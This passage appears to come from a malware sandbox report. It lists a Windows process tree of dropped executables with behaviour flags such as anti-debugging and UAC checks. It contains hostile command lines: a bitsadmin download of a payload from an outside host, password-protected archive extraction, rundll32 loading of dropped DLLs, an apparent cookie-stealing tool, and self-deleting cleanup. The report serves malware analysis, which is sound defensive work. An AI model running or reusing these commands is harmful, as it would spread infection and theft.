        "C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4744
        
        C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe
        
        C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe
        7⤵
        Executes dropped EXE
        
        PID:4960
      - C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe
        
        "C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4928
        
        C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe
        
        "C:\Users\Admin\Documents\_eaNdnN9tnNRXIFKGG2yF0fp.exe"
        7⤵
        
        PID:5480
      - C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe
        
        "C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4792
      - C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe
        
        "C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2088
        
        C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe
        
        C:\Users\Admin\Documents\1YsRDMFL5gbGtNm7s1bVicwX.exe
        7⤵
        Executes dropped EXE
        
        PID:4100
      - C:\Users\Admin\Documents\9zaJqMiAhVnJuMyvpBs_Vj8h.exe
        
        "C:\Users\Admin\Documents\9zaJqMiAhVnJuMyvpBs_Vj8h.exe"
        6⤵
        Executes dropped EXE
        
        PID:4652
      - C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe
        
        "C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2060
        
        C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe
        
        C:\Users\Admin\Documents\DHL4Bb1YNR_LuTP87OTPpPEl.exe
        7⤵
        Executes dropped EXE
        
        PID:4224
      - C:\Users\Admin\Documents\7ZI0ROMveurFDV8Aq7DVyS06.exe
        
        "C:\Users\Admin\Documents\7ZI0ROMveurFDV8Aq7DVyS06.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4140
      - C:\Users\Admin\Documents\aq3T5oYFV8GDNuh6ZK8xkEpC.exe
        
        "C:\Users\Admin\Documents\aq3T5oYFV8GDNuh6ZK8xkEpC.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:4396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:6760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:6980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        
        PID:6152
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:5612
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4820
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        
        PID:4884
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Executes dropped EXE
        
        PID:7080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:6216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:7112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:6544
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:5000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:6420
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        7⤵
        Loads dropped DLL
        
        PID:5308
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        8⤵
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:6988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:5696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:5184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst34AF.tmp\tempfile.ps1"
        7⤵
        
        PID:6512
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        Loads dropped DLL
        
        PID:5500
      - C:\Users\Admin\Documents\ARSOO0DIp2UugIvuwrSyM9oD.exe
        
        "C:\Users\Admin\Documents\ARSOO0DIp2UugIvuwrSyM9oD.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2144
      - C:\Users\Admin\Documents\mqnMtgWvbwILOMZrKc6CsUOn.exe
        
        "C:\Users\Admin\Documents\mqnMtgWvbwILOMZrKc6CsUOn.exe"
        6⤵
        Executes dropped EXE
        
        PID:5092
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 660
        7⤵
        Program crash
        
        PID:2184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 676
        7⤵
        Program crash
        
        PID:4364
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 652
        7⤵
        Program crash
        
        PID:4104
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 660
        7⤵
        Program crash
        
        PID:4752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 888
        7⤵
        Program crash
        
        PID:5612
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 1108
        7⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:5804
      - C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe
        
        "C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe"
        6⤵
        Executes dropped EXE
        
        PID:5044
        
        C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe
        
        "C:\Users\Admin\Documents\zlH6t0Do4fta14d4vAtHE7CM.exe" -a
        7⤵
        Executes dropped EXE
        
        PID:4664
      - C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe
        
        "C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4192
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im xe3VggU3QswqnlgTx1tHoeRE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\xe3VggU3QswqnlgTx1tHoeRE.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im xe3VggU3QswqnlgTx1tHoeRE.exe /f
        8⤵
        Kills process with taskkill
        
        PID:1516
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:7108
      - C:\Users\Admin\Documents\k7J6IwuP2boLb7UjbN8PRSuh.exe
        
        "C:\Users\Admin\Documents\k7J6IwuP2boLb7UjbN8PRSuh.exe"
        6⤵
        Executes dropped EXE
        
        PID:1040
        
        C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
        
        "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:412
        
        C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
        
        "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:5480
        
        C:\Program Files (x86)\Browzar\Browzar.exe
        
        "C:\Program Files (x86)\Browzar\Browzar.exe"
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of SetWindowsHookEx
        
        PID:3876
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 2752
        8⤵
        Program crash
        
        PID:6236
      - C:\Users\Admin\Documents\DwWykW183aeAvVfpw5QqTYgL.exe
        
        "C:\Users\Admin\Documents\DwWykW183aeAvVfpw5QqTYgL.exe"
        6⤵
        Executes dropped EXE
        
        PID:5084
        
        C:\Program Files (x86)\Company\NewProduct\file4.exe
        
        "C:\Program Files (x86)\Company\NewProduct\file4.exe"
        7⤵
        
        PID:2192
        
        C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
        
        "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
        7⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:3940
        
        C:\Windows\SysWOW64\rUNdlL32.eXe
        
        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
        8⤵
        Loads dropped DLL
        
        PID:5788
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:4536
        
        C:\Program Files (x86)\Company\NewProduct\jooyu.exe
        
        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
        7⤵
        Executes dropped EXE
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        Executes dropped EXE
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        Executes dropped EXE
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        8⤵
        
        PID:6496
      - C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe
        
        "C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"
        6⤵
        Executes dropped EXE
        
        PID:5072
        
        C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe
        
        "C:\Users\Admin\Documents\ypYDB0vdoDVBp7hsRzifyKGQ.exe"
        7⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:6824
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 760
        7⤵
        Program crash
        
        PID:6916
      - C:\Users\Admin\Documents\1ZEZmKpZvb1tt3sffeQxkrs7.exe
        
        "C:\Users\Admin\Documents\1ZEZmKpZvb1tt3sffeQxkrs7.exe"
        6⤵
        Executes dropped EXE
        
        PID:5020
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
        7⤵
        Loads dropped DLL
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        
        PID:8
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa3b474f50,0x7ffa3b474f60,0x7ffa3b474f70
        8⤵
        
        PID:4616
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1788 /prefetch:2
        8⤵
        
        PID:4404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1840 /prefetch:8
        8⤵
        
        PID:4236
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1896 /prefetch:8
        8⤵
        
        PID:4172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
        8⤵
        
        PID:508
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
        8⤵
        Executes dropped EXE
        
        PID:2192
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
        8⤵
        
        PID:3624
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
        8⤵
        
        PID:5156
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
        8⤵
        
        PID:5148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
        8⤵
        
        PID:5140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4744 /prefetch:8
        8⤵
        
        PID:5564
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
        8⤵
        
        PID:5604
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3344 /prefetch:8
        8⤵
        
        PID:3260
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5732 /prefetch:8
        8⤵
        
        PID:6184
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3520 /prefetch:8
        8⤵
        
        PID:5692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:8
        8⤵
        
        PID:6388
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:8
        8⤵
        
        PID:6984
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4168 /prefetch:8
        8⤵
        
        PID:5708
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:8
        8⤵
        
        PID:4104
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5548 /prefetch:8
        8⤵
        
        PID:744
        
        C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
        8⤵
        
        PID:1248
        
        C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff75d95a890,0x7ff75d95a8a0,0x7ff75d95a8b0
        9⤵
        
        PID:5888
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8
        8⤵
        
        PID:6068
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3572 /prefetch:8
        8⤵
        
        PID:6536
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:8
        8⤵
        
        PID:4356
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3476 /prefetch:8
        8⤵
        
        PID:6308
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:8
        8⤵
        
        PID:5156
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5644 /prefetch:8
        8⤵
        
        PID:5148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:8
        8⤵
        
        PID:4284
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5140 /prefetch:8
        8⤵
        
        PID:6312
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:8
        8⤵
        
        PID:5300
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6228 /prefetch:8
        8⤵
        
        PID:6788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,14353326211322521267,6791430089825010929,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5380 /prefetch:8
        8⤵
        
        PID:5456
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
